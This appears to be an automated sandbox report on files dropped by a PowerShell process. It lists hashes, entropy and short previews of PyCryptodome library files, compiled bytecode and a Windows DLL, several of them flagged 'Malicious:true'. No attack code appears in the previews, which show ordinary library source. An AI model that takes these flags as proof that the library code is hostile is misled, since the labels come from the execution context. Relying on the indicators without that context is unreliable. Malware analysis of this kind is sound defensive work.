                                                                                                                                                                                                                              Preview:from typing import Callable, Optional, Union, Set....PrimeResult = int....COMPOSITE: PrimeResult..PROBABLY_PRIME: PrimeResult....def miller_rabin_test(candidate: int, iterations: int, randfunc: Optional[Callable[[int],bytes]]=None) -> PrimeResult: .....def lucas_test(candidate: int) -> PrimeResult: ....._sieve_base: Set[int]..def test_probable_prime(candidate: int, randfunc: Optional[Callable[[int],bytes]]=None) -> PrimeResult: .....def generate_probable_prime(*,.. exact_bits: int = ...,.. randfunc: Callable[[int],bytes] = ...,.. prime_filter: Callable[[int],bool] = ...) -> int: .....def generate_probable_safe_prime(*,.. exact_bits: int = ...,.. randfunc: Callable[[int],bytes] = ...) -> int: .....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11681
                                                                                                                                                                                                                              Entropy (8bit):4.670674998377733
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:0qrskrs9t3q/IyvDBjC3zodQSHDoC4Y/zI3lSAKlWEma9XtI:zrskrs9VqvDlC3zgWqI3wAKQOtI
                                                                                                                                                                                                                              MD5:6EDF38CB6E10A7DF678A33D0A6F3875A
                                                                                                                                                                                                                              SHA1:E65A1DAEC79E81055FEBCD20B7D93302FCDB1CDA
                                                                                                                                                                                                                              SHA-256:F51738EF5459C02A5CDD445D2EB46EE410CA625A348FC825D89A374EFB86095E
                                                                                                                                                                                                                              SHA-512:B16130FCDC9B66B1BAEC876CF61AC93E29A3E80BCBD5668CC7FE6E2EED444BBC13D248C2692E90B7D9D55C313F5C65C9F2EF853B31E6B9D3758FC1FA47B89EE2
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:# ===================================================================..#..# Copyright (c) 2018, Helder Eijs <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3810
                                                                                                                                                                                                                              Entropy (8bit):4.6872218402303165
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:1REjiTAaR+gZ2KDRSjmnV69RuezESHcAFPS+ep0npIk/6I3ZuieIeKvJK5fCKsLm:giTnXDojmW8ABwi+M30W85fzsLm
                                                                                                                                                                                                                              MD5:00C57D206A1CD7FC853656AF026AEC7E
                                                                                                                                                                                                                              SHA1:0C3FDC977E7AE71D989B208A61DB93C66601177E
                                                                                                                                                                                                                              SHA-256:C8A26AFF672F06B9C4D80286E0EF8DDE8B2B41FF4C317AB75ACA0FD0D01C751E
                                                                                                                                                                                                                              SHA-512:74ECC9628812D52785545D3C5304AD5735C8D6C484C389B46F5D61AFCB339F136931C9A7A7759A6656028277B16ED6C21475F2E741B466516A9CA95BA5F61773
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from typing import Optional, Union, Callable....RandFunc = Callable[[int],int]....class IntegerBase:.... def __init__(self, value: Union[IntegerBase, int]): ....... def __int__(self) -> int: ..... def __str__(self) -> str: ..... def __repr__(self) -> str: ..... def to_bytes(self, block_size: Optional[int]=0, byteorder: str= ...) -> bytes: ..... @staticmethod.. def from_bytes(byte_string: bytes, byteorder: Optional[str] = ...) -> IntegerBase: ..... def __eq__(self, term: object) -> bool: ..... def __ne__(self, term: object) -> bool: ..... def __lt__(self, term: Union[IntegerBase, int]) -> bool: ..... def __le__(self, term: Union[IntegerBase, int]) -> bool: ..... def __gt__(self, term: Union[IntegerBase, int]) -> bool: ..... def __ge__(self, term: Union[IntegerBase, int]) -> bool: ..... def __nonzero__(self) -> bool: ..... def is_negative(self) -> bool: ..... def __add__(self, term: Union[IntegerBase, int]) -> IntegerBase: ..... def __su
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5893
                                                                                                                                                                                                                              Entropy (8bit):4.785323629162045
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:MbDqrYJALrYJHdt3EHGuIW0GAsIpLVmTIYv7Ac450L1VmXRnWPPe4LSTZ3YPH:0qrskrs9t3q/ILXVkIq745S1VmXVW+uJ
                                                                                                                                                                                                                              MD5:5BDE183C4A86339EBCDABA6469350350
                                                                                                                                                                                                                              SHA1:BA6BB73F83FE362D87182392A42A12C40A5FC3E9
                                                                                                                                                                                                                              SHA-256:A4DDFDEB17DAAAA6C77F417677E01545115DACF477C77E99F2B4E9B69A836A60
                                                                                                                                                                                                                              SHA-512:767D975AB4E894EB24ABAC860BA5DE79AF39848D1862235F04B06A735F3F53E5E785D24B6757A49B8036B30F187895BFD478B34B76716AB45DFB3F07EFEAB8B1
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:# ===================================================================..#..# Copyright (c) 2018, Helder Eijs <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):143
                                                                                                                                                                                                                              Entropy (8bit):4.509027321360697
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:1REvgBFovSL67L3XBVHa3VCfoovjeQACyWOAXUhvvn:1REYBFovSLwXBbfoyjlAqOAENv
                                                                                                                                                                                                                              MD5:454B6FB1C6C3822CE064ED36C4C54D6E
                                                                                                                                                                                                                              SHA1:3FCBB34C384AFEA58ECB58831F98A6AC2F22AAF9
                                                                                                                                                                                                                              SHA-256:BAF20195FDB64EFAB526FE676151CE94716DCE7EF897EDFBF92BC744E53AECFD
                                                                                                                                                                                                                              SHA-512:3505C80ED654D06FFBBA906455826D23CBC1C31798104762B0C116761037332E8197ED12E3ED92101E35A8F7CFCEF53BE887C80A0AF0B36BFFCC482B95F60750
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from typing import Any....from ._IntegerNative import IntegerNative...._raw_montgomery = Any....class IntegerCustom(IntegerNative):.. pass..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):28245
                                                                                                                                                                                                                              Entropy (8bit):4.4059189254872075
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:0rskrs9Vq6zWGjPJlPwLV1sJ4K7uvMQfTIfWFObegDQNqnP0+X3TrsvV31r4mu:0r6q6zWGPPI3xvMQfjCP0kDGvk
                                                                                                                                                                                                                              MD5:026CC8BB1EE4ECA1D478589549383486
                                                                                                                                                                                                                              SHA1:83B29A49CE8F5EA8C1FA5255C7E9E772A7C2BF89
                                                                                                                                                                                                                              SHA-256:F896F9D6C42D49AA3F59A30B887927BEEDEFDE6DCC840C97D4ECF01931079084
                                                                                                                                                                                                                              SHA-512:56EDC68E2EAF59E0D731256274BE169F2E109B4DAF806F50373D93B758F310B4462641DA6C186F489156AD4441101B32631BBD5D55ED3A4CA858F731A7A68330
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):81
                                                                                                                                                                                                                              Entropy (8bit):4.306529623636421
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:1L67L3VFGJeQACyoOXZohvvn:1LymJlAPmNv
                                                                                                                                                                                                                              MD5:1B3750794FA1C99B19798392A644DD26
                                                                                                                                                                                                                              SHA1:1449A147E2608AE5A6C9AFD5090E62992B39CAF7
                                                                                                                                                                                                                              SHA-256:32D4D0B0B2FD179F5DFD1A04C22A2D3FD4D178D5C7645ECF15754FC073C7E508
                                                                                                                                                                                                                              SHA-512:1ABCA6FB4ED46759D6BA04AB76F302AB9E3C14813F319295AAFAE68C91CFB3E197894916D8C9D464B35D5E14741E159CAC64166F30A0A05FF5BC9A3158D783FB
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from ._IntegerBase import IntegerBase..class IntegerGMP(IntegerBase):.. pass..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11706
                                                                                                                                                                                                                              Entropy (8bit):4.6054682088352425
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:9qrskrs9t3q/ICZ7QVq4iMJK1efS4ohX2EGupgYL1kX38q6Rp:0rskrs9VqJ4iMK1efamipgYL1kX38qe
                                                                                                                                                                                                                              MD5:B1274BA41A935E6006C7CCB1A81ED57E
                                                                                                                                                                                                                              SHA1:F025D6E5885E29EE4D246C7BE4E572A86874C37B
                                                                                                                                                                                                                              SHA-256:2EE1971FAF400609AC9F569BC9F435FF18F0DFC2ECECE7BC7F45DD4183A04CFF
                                                                                                                                                                                                                              SHA-512:C9CAA76F6C2AF4F5C4CB4C7DF57DEDE96ED07BECC44503FB67BDA27CA30EAA77EC5C143732FC3CDEA266228F22E7B14DC9582B31FFB71C84EE4E01BFD66F4A96
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):84
                                                                                                                                                                                                                              Entropy (8bit):4.2558290658438995
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:1L67L3VFGJeQACyPLRAXZohvvn:1LymJlATLKmNv
                                                                                                                                                                                                                              MD5:5629E6B58552EE91D828CFF9CA49219A
                                                                                                                                                                                                                              SHA1:CDB1DCA0B7E2E94F5393A861422C1C38D4472763
                                                                                                                                                                                                                              SHA-256:CA1DD04ECAC1474B1FBDAD15AB86881FB10E182A32C3AEB88C3F9F1B468E62E7
                                                                                                                                                                                                                              SHA-512:074FE60CAE14932319C5C6174D10F7E77594AAA40FAE192D8B16098C867C010A756193163DA74EEA235FF46781A8FE68C257A5AB456D6F063A4A261813D352E5
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from ._IntegerBase import IntegerBase..class IntegerNative(IntegerBase):.. pass..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):654
                                                                                                                                                                                                                              Entropy (8bit):5.741476232247283
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:LQplLyEnD5vOUN3LvZHLGsIj0pPvZHLivZHLwtIKNBDhaeqi32dxy8:EtvFLvZSsIjUvZ+vZ5KNB0eT32y8
                                                                                                                                                                                                                              MD5:FD114F44735712C1DA06906ECE26EEE5
                                                                                                                                                                                                                              SHA1:082B0FF9527BDAE14A2824A2E1401925B9CB7851
                                                                                                                                                                                                                              SHA-256:70D6858189DC91C55400F8628A0E3612E14008358587DF4E235E464DB4E22889
                                                                                                                                                                                                                              SHA-512:998507100F8E0FCD15785396DEE7F1996A41D73CFCD678C3C41B6B6B7B3898E8EF6EDF0C745969FF21C05C7DF7584A42151EAFC79DF105EF8E76E1BCDD80C2DA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.Vf...............................d.g.Z...d.d.l.m.Z...d.d.l.m.Z...y.#.e.e.e.f.$.r&....d.d.l.m.Z...d.d.l.m.Z...Y.y.#.e.e.f.$.r...d.d.l.m.Z...i.Z.Y.Y.y.w.x.Y.w.w.x.Y.w.)...Integer.....)...IntegerGMP)...implementation)...IntegerCustom)...IntegerNativeN)...__all__..Crypto.Math._IntegerGMPr....r....r......_implementation..ImportError..OSError..AttributeError..Crypto.Math._IntegerCustomr......Crypto.Math._IntegerNativer............DC:\Users\xbov\Desktop\pyops\Lib\site-packages\Crypto/Math/Numbers.py..<module>r........sV.........>....+.........=..I.....W.n..-............G..P........!.......G.................s..........A....)...<...A....<...A..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10639
                                                                                                                                                                                                                              Entropy (8bit):5.535610550265348
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:+P8ODJVoMu0gC5b8lODJU0163NJ0nv+z25O+1YQ5HHuc6XE:xCVy3n0zsQhHfR
                                                                                                                                                                                                                              MD5:E93F21C24FDB0671A3DBB4BE47DEBC17
                                                                                                                                                                                                                              SHA1:88D0425FAC78BEFCF402809E5740C49754DAF4D7
                                                                                                                                                                                                                              SHA-256:8EADDE1CEE266E0C29E6FE83C14616A983445EB58949C2F332EFA3E433BD26DC
                                                                                                                                                                                                                              SHA-512:B42B87B9FD6DF3221ACA7A3D2F3DF05548BE383700284D7437EB2D2E350024E6700D843F4C9B9D1A7290AFF452D77E0BF923103C605BDDC7645704F7FDF01F3F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.Vf.-........................x.....d.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.d.d...Z.d...Z.d.d.l.m.Z.....e.e.d.d...........Z.d.d...Z.d...Z.d...Z.y.).zHFunctions to create and test prime numbers...:undocumented: __package__......)...Random)...Integer)...iter_range.....Nc..........................t.........|.t.................s.t.........|.........}.|.d.v.r.t.........S.|.j...........................r.t.........S.t.........d.........}.t.........|.d.z...........}.|...t.........j...........................j...................}.t.........|.........}.d.}.|.j...........................r.|.d.z...}.|.d.z...}.|.j...........................r...t.........|.........D.]...}.d.}.|.|.|.f.v.r5t.........j...................d.|.d.z...|...........}.d.|.c.x.k...r.|.d.z...k...s.J.....J...|.|.|.f.v.r..5t.........|.|.|.........}.|.|.|.f.v.r..Tt.........d.|.........D.]%..}.t.........|.d.|.........}.|.|.k(..r....w|.|.k(..s...t.........c...c...S...t.........c...S...t.........S.).a:...Perform a Mil
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):15451
                                                                                                                                                                                                                              Entropy (8bit):5.027856095915505
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:NYQrvo5YaWE3V3GOmy4nSTdADIbAyNo/uYAd3l8kKleiWrfEUO0+qN:NRQ5H3V3GOcjIbALGYAd36kKstrNF+qN
                                                                                                                                                                                                                              MD5:C250029F43432C259426ECFCAC0AEA63
                                                                                                                                                                                                                              SHA1:47F95FF56932D77CD745913DF03E025CF6F49EA1
                                                                                                                                                                                                                              SHA-256:ABDB6710168F0FA8EF11369EB66628CF0E4104239264E1CBE04B846200E10E6A
                                                                                                                                                                                                                              SHA-512:8C92FB92E21795D8BD8C0D2B53215EE561428E6390F2FCA1073235C7707B50EB858371A6ACDFCE543BBEB8EDFA2CACA75FD0E97FF3B518F613B1996B96B9F6D7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.Vf.-........................F.....d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.....G.d...d.e.........Z.y.)......N)...iter_range..bord..bchr..ABC)...Randomc...........................e.Z.d.Z.e.j...................d...........Z.e.j...................d...........Z.e.j...................d...........Z.e.j...................d4d...........Z.e.e.j...................d5d...................Z.e.j...................d...........Z.e.j...................d...........Z.e.j...................d...........Z.e.j...................d...........Z.e.j...................d...........Z.e.j...................d...........Z.e.j...................d...........Z.e.Z.e.j...................d...........Z.e.j...................d...........Z.e.j...................d...........Z.e.j...................d...........Z.e.j...................d...........Z.e.j...................d...........Z.e.j...................d6d...........Z.e.j...................d6d...........Z.e.j...................d...........Z.e.j...................d6d
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4396
                                                                                                                                                                                                                              Entropy (8bit):5.4167560453253545
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:hbkv/Y03B/UM8ggz75VOj+AUqvO9EcQRvgQ:4YadZ8ggpVofZvbcYvgQ
                                                                                                                                                                                                                              MD5:D7EF6EEA87679AF771504C59BFC45D2C
                                                                                                                                                                                                                              SHA1:9736FE0465A053963C21D488C6E2C0F60D7100F2
                                                                                                                                                                                                                              SHA-256:3D60DDAFCF468681E43F8FC3210AB33E18E420A22D7BCE4C1F839B6749D7D1B5
                                                                                                                                                                                                                              SHA-512:74955130BD5F43C443B7186BB23B470706B01133F4E16E38390C6C0CC24574DC45ACC1EDBABDAF7C436802CBED95E5E69BD9E7F02252C0B8D8B1D95E640171BA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.Vf...............................d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.Z...e.d.e.........Z.d.e.d...Z...G.d...d.e.........Z.y.)......)...IntegerNative.....)...long_to_bytes..bytes_to_long)...load_pycryptodome_raw_lib..create_string_buffer..get_raw_buffer..backend..c_size_t..c_ulonglong)...getrandbitsa.....int monty_pow(uint8_t *out,. const uint8_t *base,. const uint8_t *exp,. const uint8_t *modulus,. size_t len,. uint64_t seed);..int monty_multiply(uint8_t *out,. const uint8_t *term1,. const uint8_t *term2,. const uint8_t *modulus,. size_t len);.z.Crypto.Math._modexp..custom)...library..apic.....................6.....e.Z.d.Z.e.d.d...........Z.d.d...Z.e.d...........Z.y.)...IntegerCustomc..........................|.d.k(..r.n,|.d.k(..r.t.........|.........}.|.j.................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):33127
                                                                                                                                                                                                                              Entropy (8bit):4.994276753438491
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:hMZxvBzHw3YmG72ABiOklBfQgRy/cNfjgDAohlwYBCGbcCARsr:hAxvdHcY72AclBfQqykNfjgDlwYtOsr
                                                                                                                                                                                                                              MD5:94977DADBD0DC2C61D24B2BA8E2D7342
                                                                                                                                                                                                                              SHA1:3201F33879E035A986661688C9D56DC93B7F6A6F
                                                                                                                                                                                                                              SHA-256:998F3D3E71DADB79989E2FA082AAC14EDF733465F8EDF37CF786CD6691D80CF6
                                                                                                                                                                                                                              SHA-512:7FC32C0ECFC7D9044FE907EFAD2196F99EBE434EDC241E9E1FD78CA99039348924EBCB0973308429BEC7C160952195E7AEF0E9EEA0BC7B0B14A3471DDF715380
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.VfUn........................V.....d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.Z.e.j"..................d.k(..r...e.d.............e.d.e.........Z.d.e.d...Z...e.e.d.........r...e.d...........e.d.....d.k(..r.d.d.l.m.Z.m.Z.m.Z.m.Z.....G.d...d.e.........Z.d...Z.n.d.d.l.m.Z...d...Z...G.d...d.e.........Z...e.........Z ..G.d...d.e.........Z!y.)......N)...tobytes..is_native_int)...backend..load_lib..get_raw_buffer..get_c_string..null_pointer..create_string_buffer..c_ulong..c_size_t..c_uint8_ptr.....)...IntegerBaseaY...typedef unsigned long UNIX_ULONG;. typedef struct { int a; int b; void *c; } MPZ;. typedef MPZ mpz_t[1];. typedef UNIX_ULONG mp_bitcnt_t;.. void __gmpz_init (mpz_t x);. void __gmpz_init_set (mpz_t rop, const mpz_t op);. void __gmpz_init_set_ui (mpz_t rop, UNIX_ULONG op);.. UNIX_ULONG __gmpz_get_ui (const mpz_t op);. void __gmpz_set (mpz_t rop, const mpz_t op);. void __gmpz
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):16264
                                                                                                                                                                                                                              Entropy (8bit):4.924202431018539
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:hZGZPFM3Ibpa2ylvxRIRbIkcbRz4JePdf0rq3Z3z8Ju8Hv0eBa5DceSDShP:h4Nbbp3CmRmdz4JePdf0u3Z32uishP
                                                                                                                                                                                                                              MD5:04AF5185AE9FD8A511737833205DF5EE
                                                                                                                                                                                                                              SHA1:BF38874E06AC4BB73AA73D52E29D470220298836
                                                                                                                                                                                                                              SHA-256:82302E693C66B15693A43A1B1C333CE9F836AB3337BAD6F8F37AA621F9DD07C9
                                                                                                                                                                                                                              SHA-512:D99F33455E80A5B56DDE6E7F61D467257D3EE9423DF94A5FEE587542C85E02EC515CE87698FDA91820A9C008BE0B34AFCC3953363137996C0E0AE8B4537DD3DA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.Vf.-........................>.....d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.....G.d...d.e.........Z.y.)......)...IntegerBase.....)...long_to_bytes..bytes_to_long..inverse..GCDc.....................h.....e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d5d...Z.e.d6d...........Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.e.Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d7d...Z.d7d...Z.d...Z.d7d...Z.d...Z.d...Z d...Z!d...Z"d ..Z#d!..Z$d"..Z%d#..Z&d$..Z'd%..Z(d&..Z)d'..Z*d(..Z+d)..Z,d*..Z-d+..Z.d,..Z/d-..Z0d...Z1d/..Z2d0..Z3d1..Z4d2..Z5e6d3..........Z7e6d4..........Z8y.)8..IntegerNativez3A class to model a natural integer (including zero)c..........................t.........|.t.................r.t.........d.............|.j...................|._.........y.#.t.........$.r...|.|._.........Y.y.w.x.Y.w.).Nz-A floating point type is not a natural number)...isinstance..float..ValueError.._value..AttributeError)...self..values.... .KC:\Users\xbov\Desktop\pyops\Lib\site-packages\Crypto/Math/_IntegerNative
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):166
                                                                                                                                                                                                                              Entropy (8bit):4.5847043838810775
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:oXdz5lOlllVO8l4KOFK5VcK85kdVWrz46oicRwIaQHtgem/l:jl/VneRw52KNdArMDic6Iaatgem/l
                                                                                                                                                                                                                              MD5:ECDBA80A28E171C0E3006DFA57DB04C9
                                                                                                                                                                                                                              SHA1:93BF333EF74A7B961B2E6778E26EFC3A48650902
                                                                                                                                                                                                                              SHA-256:4E5C654AADA40CDB53A0E9542312DAADD1BB1B307AA0D772A2AC373DA5561397
                                                                                                                                                                                                                              SHA-512:6CCEEBEB8229CA99FA9E691EF8BEF9253BBE457E48C0FBD46B17FE3882B8FF7FDF74C0A09B31892EDBE77E75EA14B4590AAA6FB07FCF07B19D1A8956B881A86D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.Vf................................y.).N..r..........EC:\Users\xbov\Desktop\pyops\Lib\site-packages\Crypto/Math/__init__.py..<module>r........s.........r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):35840
                                                                                                                                                                                                                              Entropy (8bit):5.928082706906375
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:8bEkzS7+k9rMUb8cOe9rs9ja+V/Mhjh56GS:8bEP779rMtcOCs0I/Mhf
                                                                                                                                                                                                                              MD5:B41160CF884B9E846B890E0645730834
                                                                                                                                                                                                                              SHA1:A0F35613839A0F8F4A87506CD59200CCC3C09237
                                                                                                                                                                                                                              SHA-256:48F296CCACE3878DE1148074510BD8D554A120CAFEF2D52C847E05EF7664FFC6
                                                                                                                                                                                                                              SHA-512:F4D57351A627DD379D56C80DA035195292264F49DC94E597AA6638DF5F4CF69601F72CC64FC3C29C5CBE95D72326395C5C6F4938B7895C69A8D839654CFC8F26
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N4.|.U./.U./.U./.-a/.U./.*...U./A-...U./.U./!U./.*...U./.*...U./.*...U./0....U./0....U./0../.U./0....U./Rich.U./................PE..d......e.........." ...%.^...0......`.....................................................`..........................................~..|...\...d...............................,....s...............................q..@............p..(............................text...8].......^.................. ..`.rdata.......p.......b..............@..@.data................v..............@....pdata..............................@..@.rsrc...............................@..@.reloc..,...........................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
